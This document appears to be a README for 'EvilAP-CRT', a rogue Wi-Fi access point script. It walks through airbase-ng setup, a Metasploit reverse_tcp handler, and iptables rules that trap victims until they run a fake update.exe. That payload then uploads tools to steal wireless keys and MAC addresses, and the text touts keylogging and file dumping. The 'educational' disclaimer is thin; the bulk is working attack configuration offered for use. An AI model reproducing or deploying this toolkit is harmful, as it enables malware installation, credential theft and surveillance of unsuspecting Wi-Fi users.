hm2075

EvilAP-CRT  v1.0

CRT stands for capture,release and transparency


Please note this is proof of concept and for educational purposes only, this is not be used out in the wild.


Victims cannot surf through out EvilAP unless they download and execute our fake update,
authorisation to use the fakeap then works through mac authentication thus preventing those that do not download
our fake update from surfing.


./evilapcrt.sh   to run,   make sure you give exec permission to this file
mc2.sh and mc3.sh need exec permissions too   you also need lighttpd for this to work

So what does the script do?

export   fakeap_interface=wlan0     #this our fakeap, we use wlan0 which then turns to mon0 later in the script
export   router=192.168.1.1         #this is the route to the internet, this is usually your router, it is needed as a gateway
export   gateway_interface=eth0     #this is our access to the internet, it can be wireless too, but first make sure you connect to the internet


First we copy dhcpd.conf to it's correct location, it looks like this

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.0;
option domain-name "example.com";
option domain-name-servers 10.0.0.1;
range dynamic-bootp 10.0.0.16 10.0.0.55;
#range 10.0.0.20 10.0.0.50;

}


We then start our fakeap on wlan0

modprobe tun
airmon-ng start $fakeap_interface  ####our fake ap assuming it's wlan0 start and is running as mon0
FakeAP -e airbase-ng -e "Free WiFi" mon0 -v  ###### started on mon0 essid Free WiFi, we can use extended features here such as -P for probe responding


We start metasploit with
Metasploit -e ./msfconsole -r /root/WK2/hb.rc     #### lets have a look at hb.rc

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp   #we are using meterpreter reverse exe which i created earlier and renamed to update.exe and becomes our fake update
set LHOST 10.0.0.1   ## i set it to 10.0.0.1 with port 28
set LPORT 28
set AutoRunScript /root/WK2/hb2.rb    ##this is our autorun script
set ExitOnSession false              # we dont want to exit, we want more victims to be pwned
show options
exploit -j


Now lets look at hb2.rb   this is a long script which is executed,  i will cut it down to the relevant bits

bin = "wkv.exe"                ###wireless key viewer modified to bypass AV's
bin2 = "getmac1.exe"          #### this is a windows utility, getmac.exe which dumps the users mac address
bin3 = "getmac.bat"           ### I created the bat file so it executes getmac1.exe writes the mac address to the system drive of the victim as macx.txt


We then upload all these files and execute, we grab the wireless keys and we get the victims mac address
wireless keys are downloaded to keys folder as random text files and mac address to allowmac folder again with random text file otherwise things get overwritten. I am skipping all the technical stuff out,   the bulk of it is commented anyway for those that are interested


Iptables are then setup

echo "1">/proc/sys/net/ipv4/ip_forward    # port forwarding is important otherwise victim cannot surf
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1800
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -F
iptables -t mangle -F
iptables -t nat -A POSTROUTING -s 10.0.0.0/24 -j MASQUERADE -o $gateway_interface
iptables -t nat -A PREROUTING -p udp -j DNAT --to $router       #### gate way to the internet
iptables -t nat -A PREROUTING -m mark --mark 0x42 -j ACCEPT      ### any marked macs we give them internet
iptables -t filter -I FORWARD 1 -m mark --mark 0x42 -j ACCEPT   ### as above, we allow marked macs to continue
iptables -t nat -A PREROUTING -i at0 -p udp --dport 53 -j ACCEPT   #### udp needed
iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j REDIRECT --to-port 80  ###### any non marked mac's get redirected to our fake update page
sleep 2
/etc/init.d/dhcp3-server restart

Please note this is a simple iptables,    for protection block all ports except for 80, 53 and 28 which is our meterpreter port.... also block access to your router at 192.168.1.1 or atleast put better password on it otherwise you will end up with egg on your face hehehehe       newbies use this at your own risk


We then execute mc2 and mc3.sh, these are looped

mc2.sh
grep -h -E -o '[[:xdigit:]]{2}(-[[:xdigit:]]{2}){5}' /root/WK2/allowmac/*  > /root/WK2/allowmac/mac
####here we are extracting the macs based on a pattern to mac.txt,  this is because getmac extracts other data which we dont need


mc3.sh
KNOWN_MACS=`cat /root/WK2/allowmac/mac.txt | awk '{print $1}'`
for MAC in $KNOWN_MACS ; do iptables -t mangle -I PREROUTING -m mac --mac-source $MAC -j MARK --set-mark 0x42
#### once our victim has been exploited his mac address is available in mac.txt, we now need to mark this mac address so that they can surf the internet, we do this with the above command, and loop it

Now our victim can connect, be redirected to our fake update page, download our fake update.exe and then once the hb2.rb script is run we allow them internet but stopping others from connecting

we cannot stop giving access to the victim once exploited by deleting their mac address from mac.txt, you need to flush by iptables -t mangle -F,  this puts all users back into the redirect script


finally we run other tools such as dsnif, urlsniff etc etc...... here the possibilities are endless you can go back to metaspoit, interact with any of the sessions created and dump some interesting stuff. meterpreter gives you keylogging features too as well as the ability to dump doc, txt jpg's etc to a folder.


remember to delete everything in allowmac folder, except for mac.txt and make sure mac.txt is empty when finished


thats all folks